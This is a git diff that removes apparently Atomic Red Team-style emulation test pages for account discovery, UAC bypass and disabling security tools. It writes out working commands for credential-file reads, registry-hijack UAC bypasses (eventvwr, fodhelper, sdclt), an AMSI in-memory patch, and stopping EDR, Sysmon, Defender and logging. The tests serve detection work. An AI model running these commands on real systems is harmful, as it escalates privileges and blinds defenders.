-## Atomic Test #2 - View sudoers access
-(requires root)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-cat /etc/sudoers > #{output_file}
-cat #{output_file}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - View accounts with UID 0
-View accounts wtih UID 0
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-grep 'x:0:' /etc/passwd > #{output_file}
-cat #{output_file} 2>/dev/null
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file} 2>/dev/null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - List opened files by user
-List opened files by user
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Show if a user account has ever logged in remotely
-Show if a user account has ever logged in remotely
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-lastlog > #{output_file}
-cat #{output_file}
-```
-
-#### Cleanup Commands:
-```sh
-rm -f #{output_file}
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if lastlog command exists on the machine
-##### Check Prereq Commands:
-```sh
-if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; 
-```
-##### Get Prereq Commands:
-```sh
-echo "Install lastlog on the machine to run the test."; exit 1;
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Enumerate users and groups
-Utilize groups and id to enumerate users and groups
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-groups
-id
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Enumerate users and groups
-Utilize local utilities to enumerate users and groups
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-dscl . list /Groups
-dscl . list /Users
-dscl . list /Users | grep -v '_'
-dscacheutil -q group
-dscacheutil -q user
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Enumerate all accounts
-Enumerate all accounts
-Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net user
-net user /domain
-dir c:\Users\
-cmdkey.exe /list
-net localgroup "Users"
-net localgroup
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Enumerate all accounts via PowerShell
-Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-net user
-net user /domain
-get-localuser
-get-localgroupmember -group Users
-cmdkey.exe /list
-ls C:/Users
-get-childitem C:\Users\
-dir C:\Users\
-get-aduser -filter *
-get-localgroup
-net localgroup
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Enumerate logged on users via CMD
-Enumerate logged on users. Upon exeuction, logged on users will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-query user
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Enumerate logged on users via PowerShell
-Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-query user
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1088.md b/Atomic_Threat_Coverage/Triggers/T1088.md
deleted file mode 100644
index 040bee6..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1088.md
+++ /dev/null
@@ -1,286 +0,0 @@
-# T1088 - Bypass User Account Control
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1088)
-<blockquote>Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
-
-If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
-
-Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
-
-* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)
-
-Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Bypass UAC using Event Viewer (cmd)](#atomic-test-1---bypass-uac-using-event-viewer-cmd)
-
-- [Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell)](#atomic-test-2---bypass-uac-using-event-viewer-powershell)
-
-- [Atomic Test #3 - Bypass UAC using Fodhelper](#atomic-test-3---bypass-uac-using-fodhelper)
-
-- [Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell](#atomic-test-4---bypass-uac-using-fodhelper---powershell)
-
-- [Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell)](#atomic-test-5---bypass-uac-using-computerdefaults-powershell)
-
-- [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories)
-
-- [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute)
-
-
-<br/>
-
-## Atomic Test #1 - Bypass UAC using Event Viewer (cmd)
-Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-Upon execution command prompt should be launched with administrative privelages
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
-cmd.exe /c eventvwr.msc
-```
-
-#### Cleanup Commands:
-```cmd
-reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell)
-PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-Upon execution command prompt should be launched with administrative privelages
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
-Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
-Start-Process "C:\Windows\System32\eventvwr.msc"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Bypass UAC using Fodhelper
-Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
-Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
-reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
-fodhelper.exe
-```
-
-#### Cleanup Commands:
-```cmd
-reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell
-PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
-Upon execution command prompt will be opened.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
-New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
-Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
-Start-Process "C:\Windows\System32\fodhelper.exe"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell)
-PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
-Upon execution administrative command prompt should open
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
-New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
-Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
-Start-Process "C:\Windows\System32\ComputerDefaults.exe"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories
-Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
-Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-mkdir "\\?\C:\Windows \System32\"
-copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
-mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
-```
-
-#### Cleanup Commands:
-```cmd
-rd "\\?\C:\Windows \" /S /Q >nul 2>nul
-del "c:\testbypass.exe" >nul 2>nul
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute
-Bypasses User Account Control using a fileless method, registry only. 
-Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
-[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
-Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
-New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
-Start-Process -FilePath $env:windir\system32\sdclt.exe
-Start-Sleep -s 3
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1089.md b/Atomic_Threat_Coverage/Triggers/T1089.md
deleted file mode 100644
index bf07e8d..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1089.md
+++ /dev/null
@@ -1,787 +0,0 @@
-# T1089 - Disabling Security Tools
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089)
-<blockquote>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Disable iptables firewall](#atomic-test-1---disable-iptables-firewall)
-
-- [Atomic Test #2 - Disable syslog](#atomic-test-2---disable-syslog)
-
-- [Atomic Test #3 - Disable Cb Response](#atomic-test-3---disable-cb-response)
-
-- [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux)
-
-- [Atomic Test #5 - Stop Crowdstrike Falcon on Linux](#atomic-test-5---stop-crowdstrike-falcon-on-linux)
-
-- [Atomic Test #6 - Disable Carbon Black Response](#atomic-test-6---disable-carbon-black-response)
-
-- [Atomic Test #7 - Disable LittleSnitch](#atomic-test-7---disable-littlesnitch)
-
-- [Atomic Test #8 - Disable OpenDNS Umbrella](#atomic-test-8---disable-opendns-umbrella)
-
-- [Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS](#atomic-test-9---stop-and-unload-crowdstrike-falcon-on-macos)
-
-- [Atomic Test #10 - Unload Sysmon Filter Driver](#atomic-test-10---unload-sysmon-filter-driver)
-
-- [Atomic Test #11 - Disable Windows IIS HTTP Logging](#atomic-test-11---disable-windows-iis-http-logging)
-
-- [Atomic Test #12 - Uninstall Sysmon](#atomic-test-12---uninstall-sysmon)
-
-- [Atomic Test #13 - AMSI Bypass - AMSI InitFailed](#atomic-test-13---amsi-bypass---amsi-initfailed)
-
-- [Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14---amsi-bypass---remove-amsi-provider-reg-key)
-
-- [Atomic Test #15 - Disable Arbitrary Security Windows Service](#atomic-test-15---disable-arbitrary-security-windows-service)
-
-- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell)
-
-- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt)
-
-- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry)
-
-- [Atomic Test #19 - Disable Microft Office Security Features](#atomic-test-19---disable-microft-office-security-features)
-
-- [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files)
-
-- [Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-21---stop-and-remove-arbitrary-security-windows-service)
-
-- [Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-22---uninstall-crowdstrike-falcon-on-windows)
-
-
-<br/>
-
-## Atomic Test #1 - Disable iptables firewall
-Disables the iptables firewall
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
-then
-  service iptables stop
-  chkconfig off iptables
-  service ip6tables stop
-  chkconfig off ip6tables
-else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
-  systemctl stop firewalld
-  systemctl disable firewalld
-fi
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Disable syslog
-Disables syslog collection
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
-then
-  service rsyslog stop
-  chkconfig off rsyslog
-else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
-  systemctl stop rsyslog
-  systemctl disable rsyslog
-fi
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Disable Cb Response
-Disable the Cb Response service
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
-then
-  service cbdaemon stop
-  chkconfig off cbdaemon
-else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
-  systemctl stop cbdaemon
-  systemctl disable cbdaemon
-fi
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Disable SELinux
-Disables SELinux enforcement
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-setenforce 0
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Stop Crowdstrike Falcon on Linux
-Stop and disable Crowdstrike Falcon on Linux
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo systemctl stop falcon-sensor.service
-sudo systemctl disable falcon-sensor.service
-```
-
-#### Cleanup Commands:
-```sh
-sudo systemctl enable falcon-sensor.service
-sudo systemctl start falcon-sensor.service
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Disable Carbon Black Response
-Disables Carbon Black Response
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Disable LittleSnitch
-Disables LittleSnitch
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Disable OpenDNS Umbrella
-Disables OpenDNS Umbrella
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS
-Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist|
-| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo launchctl unload #{falcond_plist}
-sudo launchctl unload #{userdaemon_plist}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Unload Sysmon Filter Driver
-Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
-run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-fltmc.exe unload #{sysmon_driver}
-```
-
-#### Cleanup Commands:
-```cmd
-sysmon -u -i > nul 2>&1
-sysmon -i -accepteula -i > nul 2>&1
-%temp%\Sysmon\sysmon.exe -u > nul 2>&1
-%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Sysmon must be downloaded
-##### Check Prereq Commands:
-```powershell
-if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
-Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
-Remove-Item $env:TEMP\Sysmon.zip -Force
-```
-##### Description: sysmon must be Installed
-##### Check Prereq Commands:
-```powershell
-if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
-{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
-```
-##### Description: sysmon filter must be loaded
-##### Check Prereq Commands:
-```powershell
-if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-sysmon -u
-sysmon -accepteula -i
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Disable Windows IIS HTTP Logging
-Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
-This action requires HTTP logging configurations in IIS to be unlocked.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| website_name | The name of the website on a server | string | Default Web Site|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
-```
-
-#### Cleanup Commands:
-```powershell
-C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - Uninstall Sysmon
-Uninstall Sysinternals Sysmon for Defense Evasion
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder&#92;T1089&#92;bin&#92;sysmon.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sysmon -u
-```
-
-#### Cleanup Commands:
-```cmd
-sysmon -i -accepteula >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Sysmon executable must be available
-##### Check Prereq Commands:
-```powershell
-if(cmd /c where sysmon) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
-New-Item -ItemType Directory $parentpath -Force | Out-Null
-Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
-Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
-if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
-```
-##### Description: Sysmon must be installed
-##### Check Prereq Commands:
-```powershell
-if(cmd /c sc query sysmon) { exit 0} else { exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-cmd /c sysmon -i -accepteula
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - AMSI Bypass - AMSI InitFailed
-Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
-Upon execution, no output is displayed.
-
-https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
-```
-
-#### Cleanup Commands:
-```powershell
-[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key
-With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
-This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
-Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
-```
-
-#### Cleanup Commands:
-```powershell
-New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #15 - Disable Arbitrary Security Windows Service
-With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
-Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
-To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| service_name | The name of the service to stop | String | McAfeeDLPAgentService|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-net.exe stop #{service_name}
-sc.exe config #{service_name} start= disabled
-```
-
-#### Cleanup Commands:
-```cmd
-sc.exe config #{service_name} start= auto >nul 2>&1
-net.exe start #{service_name} >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
-Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
-in Windows settings.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Set-MpPreference -DisableRealtimeMonitoring 1
-Set-MpPreference -DisableBehaviorMonitoring 1
-Set-MpPreference -DisableScriptScanning 1
-Set-MpPreference -DisableBlockAtFirstSeen 1
-```
-
-#### Cleanup Commands:
-```powershell
-Set-MpPreference -DisableRealtimeMonitoring 0
-Set-MpPreference -DisableBehaviorMonitoring 0
-Set-MpPreference -DisableScriptScanning 0
-Set-MpPreference -DisableBlockAtFirstSeen 0
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - Tamper with Windows Defender Command Prompt
-Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
-However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
-will be displayed twice and the WinDefend service status will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sc stop WinDefend
-sc config WinDefend start=disabled
-sc query WinDefend
-```
-
-#### Cleanup Commands:
-```cmd
-sc start WinDefend >nul 2>&1
-sc config WinDefend start=enabled >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
